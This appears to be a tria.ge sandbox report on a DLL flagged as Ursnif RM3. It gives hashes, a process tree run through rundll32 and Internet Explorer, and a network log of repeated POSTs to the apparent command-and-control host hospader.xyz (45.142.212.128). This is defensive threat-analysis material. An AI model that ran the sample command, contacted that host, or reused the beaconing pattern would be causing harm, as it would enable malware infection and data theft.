Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    23/12/2020, 12:40 UTC

General

  • Target

    b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll

  • Size

    233KB

  • MD5

    68cf96f4bc91628e22e1526d9728990b

  • SHA1

    a1e1063ec8c3667e86e1afab81cb6bbea84485b3

  • SHA256

    790191b70550856b3e8ec108fdb82cd8d852822d6716ec865f21cfb5ad160b7c

  • SHA512

    ca6bb734df8bf35a2f3346ff5ad954ecc058a719b0eabf90d8c323b80ed6b8659cef5b5f51f65b149c48435bc396920549a72471b0cde1d70a02bf59dbf37b24

Malware Config

Signatures

  • Ursnif RM3

    A heavily modified version of Ursnif discovered in the wild.

  • Blocklisted process makes network request 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 198 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 32 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\b037fc5681d3d59f4ed0c7cd2a5d05ed8df3aaa0.dll,#1
      2⤵
      • Blocklisted process makes network request
      PID:2004
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:836
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1248 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1492
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1020
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:832
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:832 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1320
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:892
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1812
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:480
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:480 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:344
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:884
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1908
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1000
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1000 CREDAT:275457 /prefetch:2
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1068

Network

  • flag-unknown
    DNS
    go.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    go.microsoft.com
    IN A
    Response
    go.microsoft.com
    IN CNAME
    go.microsoft.com.edgekey.net
    go.microsoft.com.edgekey.net
    IN CNAME
    e11290.dspg.akamaiedge.net
    e11290.dspg.akamaiedge.net
    IN A
    23.206.90.201
  • flag-unknown
    DNS
    hospader.xyz
    Remote address:
    8.8.8.8:53
    Request
    hospader.xyz
    IN A
    Response
    hospader.xyz
    IN A
    45.142.212.128
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=a0299c9ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 778
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    crl.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    crl.identrust.com
    IN A
    Response
    crl.identrust.com
    IN CNAME
    identrust.edgesuite.net
    identrust.edgesuite.net
    IN CNAME
    a1952.dscq.akamai.net
    a1952.dscq.akamai.net
    IN A
    95.100.96.201
    a1952.dscq.akamai.net
    IN A
    95.100.96.232
  • flag-unknown
    DNS
    crl.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    crl.identrust.com
    IN A
    Response
    crl.identrust.com
    IN CNAME
    identrust.edgesuite.net
    identrust.edgesuite.net
    IN CNAME
    a1952.dscq.akamai.net
    a1952.dscq.akamai.net
    IN A
    95.100.96.232
    a1952.dscq.akamai.net
    IN A
    95.100.96.201
  • flag-unknown
    GET
    http://crl.identrust.com/DSTROOTCAX3CRL.crl
    IEXPLORE.EXE
    Remote address:
    95.100.96.232:80
    Request
    GET /DSTROOTCAX3CRL.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.identrust.com
    Response
    HTTP/1.1 200 OK
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Last-Modified: Wed, 09 Dec 2020 20:58:58 GMT
    ETag: "4a6-5b60e53f64880"
    Accept-Ranges: bytes
    Content-Length: 1190
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Type: application/pkix-crl
    Cache-Control: max-age=3600
    Expires: Wed, 23 Dec 2020 13:41:10 GMT
    Date: Wed, 23 Dec 2020 12:41:10 GMT
    Connection: keep-alive
  • flag-unknown
    GET
    http://crl.identrust.com/DSTROOTCAX3CRL.crl
    IEXPLORE.EXE
    Remote address:
    95.100.96.201:80
    Request
    GET /DSTROOTCAX3CRL.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.identrust.com
    Response
    HTTP/1.1 200 OK
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Last-Modified: Wed, 09 Dec 2020 20:58:58 GMT
    ETag: "4a6-5b60e53f64880"
    Accept-Ranges: bytes
    Content-Length: 1190
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Type: application/pkix-crl
    Cache-Control: max-age=3600
    Expires: Wed, 23 Dec 2020 13:41:10 GMT
    Date: Wed, 23 Dec 2020 12:41:10 GMT
    Connection: keep-alive
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    rundll32.exe
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=95d504fffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 791
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    rundll32.exe
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=8f08f7dffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 783
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    rundll32.exe
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=71397f9ffe2926d7
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 791
    Host: hospader.xyz
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    crl.verisign.com
    Remote address:
    8.8.8.8:53
    Request
    crl.verisign.com
    IN A
    Response
    crl.verisign.com
    IN CNAME
    crl-symcprod.digicert.com
    crl-symcprod.digicert.com
    IN CNAME
    cs9.wac.phicdn.net
    cs9.wac.phicdn.net
    IN A
    72.21.91.29
  • flag-unknown
    DNS
    go.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    go.microsoft.com
    IN A
    Response
    go.microsoft.com
    IN CNAME
    go.microsoft.com.edgekey.net
    go.microsoft.com.edgekey.net
    IN CNAME
    e11290.dspg.akamaiedge.net
    e11290.dspg.akamaiedge.net
    IN A
    23.206.90.201
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=8846703ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 787
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:41:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    2.21.41.70
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=8098407ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 789
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    go.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    go.microsoft.com
    IN A
    Response
    go.microsoft.com
    IN CNAME
    go.microsoft.com.edgekey.net
    go.microsoft.com.edgekey.net
    IN CNAME
    e11290.dspg.akamaiedge.net
    e11290.dspg.akamaiedge.net
    IN A
    23.206.90.201
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=78e54dfffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 793
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    go.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    go.microsoft.com
    IN A
    Response
    go.microsoft.com
    IN CNAME
    go.microsoft.com.edgekey.net
    go.microsoft.com.edgekey.net
    IN CNAME
    e11290.dspg.akamaiedge.net
    e11290.dspg.akamaiedge.net
    IN A
    23.206.90.201
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=6a8a02fffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 782
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=62de349ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 784
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:42:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    DNS
    go.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    go.microsoft.com
    IN A
    Response
    go.microsoft.com
    IN CNAME
    go.microsoft.com.edgekey.net
    go.microsoft.com.edgekey.net
    IN CNAME
    e11290.dspg.akamaiedge.net
    e11290.dspg.akamaiedge.net
    IN A
    23.206.90.201
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=5b32663ffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 772
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:43:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-unknown
    POST
    https://hospader.xyz/index.htm
    IEXPLORE.EXE
    Remote address:
    45.142.212.128:443
    Request
    POST /index.htm HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Content-Type: multipart/form-data; boundary=53203cbffe2926d7
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: hospader.xyz
    Content-Length: 776
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.14.0 (Ubuntu)
    Date: Wed, 23 Dec 2020 12:43:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    4.3kB
    10
    8

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    hospader.xyz
    tls
    IEXPLORE.EXE
    645 B
    3.8kB
    7
    6
  • 95.100.96.232:80
    http://crl.identrust.com/DSTROOTCAX3CRL.crl
    http
    IEXPLORE.EXE
    365 B
    1.9kB
    5
    4

    HTTP Request

    GET http://crl.identrust.com/DSTROOTCAX3CRL.crl

    HTTP Response

    200
  • 95.100.96.201:80
    http://crl.identrust.com/DSTROOTCAX3CRL.crl
    http
    IEXPLORE.EXE
    365 B
    1.9kB
    5
    4

    HTTP Request

    GET http://crl.identrust.com/DSTROOTCAX3CRL.crl

    HTTP Response

    200
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    rundll32.exe
    4.5kB
    6.5kB
    14
    14

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.1kB
    5.0kB
    12
    10

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    4.3kB
    10
    8

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    4.9kB
    9
    9

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    5.0kB
    10
    10

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    4.9kB
    9
    9

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    5.0kB
    10
    10

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 45.142.212.128:443
    https://hospader.xyz/index.htm
    tls, http
    IEXPLORE.EXE
    2.0kB
    4.3kB
    10
    8

    HTTP Request

    POST https://hospader.xyz/index.htm

    HTTP Response

    404
  • 8.8.8.8:53
    go.microsoft.com
    dns
    62 B
    157 B
    1
    1

    DNS Request

    go.microsoft.com

    DNS Response

    23.206.90.201

  • 8.8.8.8:53
    hospader.xyz
    dns
    58 B
    74 B
    1
    1

    DNS Request

    hospader.xyz

    DNS Response

    45.142.212.128

  • 8.8.8.8:53
    crl.identrust.com
    dns
    63 B
    164 B
    1
    1

    DNS Request

    crl.identrust.com

    DNS Response

    95.100.96.232
    95.100.96.201

  • 8.8.8.8:53
    crl.identrust.com
    dns
    63 B
    164 B
    1
    1

    DNS Request

    crl.identrust.com

    DNS Response

    95.100.96.201
    95.100.96.232

  • 8.8.8.8:53
    crl.verisign.com
    dns
    62 B
    146 B
    1
    1

    DNS Request

    crl.verisign.com

    DNS Response

    72.21.91.29

  • 8.8.8.8:53
    go.microsoft.com
    dns
    62 B
    157 B
    1
    1

    DNS Request

    go.microsoft.com

    DNS Response

    23.206.90.201

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    2.21.41.70

  • 8.8.8.8:53
    go.microsoft.com
    dns
    62 B
    157 B
    1
    1

    DNS Request

    go.microsoft.com

    DNS Response

    23.206.90.201

  • 8.8.8.8:53
    go.microsoft.com
    dns
    62 B
    157 B
    1
    1

    DNS Request

    go.microsoft.com

    DNS Response

    23.206.90.201

  • 8.8.8.8:53
    go.microsoft.com
    dns
    62 B
    157 B
    1
    1

    DNS Request

    go.microsoft.com

    DNS Response

    23.206.90.201

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1160-4-0x000007FEF77D0000-0x000007FEF7A4A000-memory.dmp

    Filesize

    2.5MB

  • memory/2004-3-0x00000000001C0000-0x00000000001D2000-memory.dmp

    Filesize

    72KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.